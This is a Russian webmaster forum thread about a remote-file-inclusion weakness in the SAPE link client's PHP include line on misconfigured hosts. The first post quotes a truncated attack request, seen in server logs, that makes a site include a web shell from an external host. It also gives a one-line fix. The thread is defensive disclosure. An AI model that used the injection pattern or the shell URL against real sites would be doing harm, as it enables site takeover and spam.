![]() |
#1 |
Новичок
|
![]() Практика показала, что на некоторых хостингах и для некоторых движков код
Код:
<?php if (!defined('_SAPE_USER')){ define('_SAPE_USER', 'd56b17c1d94442b8874c6ad44aae3202'); } require_once($_SERVER['DOCUMENT_ROOT'].'/'._SAPE_USER.'/sape.php'); $sape = new SAPE_client(); ?> require_once($_SERVER['DOCUMENT_ROOT'].'/'._SAPE_USER.'/sape.php'); Злоумышненники, используя запрос вида http://www.ваш-сайт.ru////?_SERVER[D...afterlife.txt? могут нарушить работу вашего сайта, в том числе рассылать спам от имени вашего сайта. В качестве строчки после _SERVER[DOCUMENT_ROOT] используется ссылка на код эксплоита (ссылка из логов http://jokernet.fileave.com/afterlife.txt? живая - можете посмотреть (это не вирус, а тело шелла, так что кликать безопасно), а заодно проверить, не случится ли чего с вашим сайтом, если его подставить на место www.ваш-сайт.ru). Решение проблемы на стороне сайта: заменить Код:
require_once($_SERVER['DOCUMENT_ROOT'].'/'._SAPE_USER.'/sape.php'); Код:
require_once(getenv('DOCUMENT_ROOT').'/'._SAPE_USER.'/sape.php'); |
![]() |
![]() |
![]() |
#3 | ||
Эксперт
Регистрация: 03.07.2007
Адрес: Chinatown
Сообщений: 7,267
Вес репутации: 624
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
![]() Цитата:
Цитата:
__________________
тексты по 10 руб/кзнак автоматизируй все, не мучайся! |
||
![]() |
![]() |
![]() |
#4 |
Пожиратель черепашкоВ
Регистрация: 24.12.2008
Адрес: Телемелетрямдия
Сообщений: 4,739
Вес репутации: 410
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
![]()
__________________
|
![]() |
![]() |
![]() |
#5 |
Специалист
Регистрация: 06.11.2009
Сообщений: 428
Вес репутации: 199
![]() |
![]() Это что, такой оригинальный способ распространят вирусы ТС придумал? -)))
|
![]() |
![]() |
![]() |
#6 |
Новичок
|
![]() dark, уходить с хостинга - вариант, переписать движок - тоже вариант (нормально написанный движок и нормально настроенный хостинг такой уязвимости не должны допустить), но если изменить в коде сапы одну строчку, то без потери функциональности проблемы можно избежать (кмк) на любом движке и на любом хостинге.
|
![]() |
![]() |
![]() |
#8 |
Новичок
|
![]() sylex, конечно, неизвестно.
И кстати проверил все свои сайты - сапа не добавила уязвимостей нормально написанному сайту. А вот затрояненный клиент на поддержку достался - куча сайтов с этой проблемой. А учитывая, что у сапы десятки тысяч сайтов, то даже пара процентов проблемных - это много. Поэтому, считаю, что если можно повысить безопасность кода, это надо сделать. |
![]() |
![]() |
![]() |
#9 |
Администратор
Регистрация: 05.02.2007
Сообщений: 18,405
Вес репутации: 730
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
![]() Shema, абсолютно все могут НЕ пользоваться строчкой $_SERVER['DOCUMENT_ROOT'].
Что во первых - не уберет уязвимость, если она есть на этом хостинге. 2 - в приведенном примере что то сапы? Ну а объяснить как ставить по другому чтобы было понятно ВСЕМ и работало ...
__________________
Читаем ФАК |
![]() |
![]() |
![]() |
#10 | |
Починяю примуса
Регистрация: 26.09.2008
Сообщений: 1,505
Вес репутации: 300
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
![]() ТС, мои соболезнования, если ваш хост и сайт позволяют подставлять в ГЕт суперглобальные переменные, то...
Цитата:
__________________
|
|
![]() |
![]() |
![]() |
|
|
![]() |
||||
Тема | Автор | Раздел | Ответов | Последнее сообщение |
Нужен php-скрипт для вставки текста | SergejF | Разработка и сопровождение сайтов | 8 | 15.04.2010 23:09 |
Взлом сайта с установкой кода sape | Paffy | Вопросы по работе системы | 4 | 31.01.2009 17:12 |
Проблема с индексацией страниц после обновления кода sape для контекстных ссылок | serp | Ошибки при работе с системой | 0 | 06.03.2008 14:29 |
После установки кода sape сайты выпали из yandexa | mgpetrov | Яндекс | 9 | 27.06.2007 16:44 |
полная замена движка сайта: порядок переноса кода SAPE? | saddat | Вопросы по работе системы | 23 | 30.04.2007 10:23 |
Часовой пояс GMT +3, время: 09:08.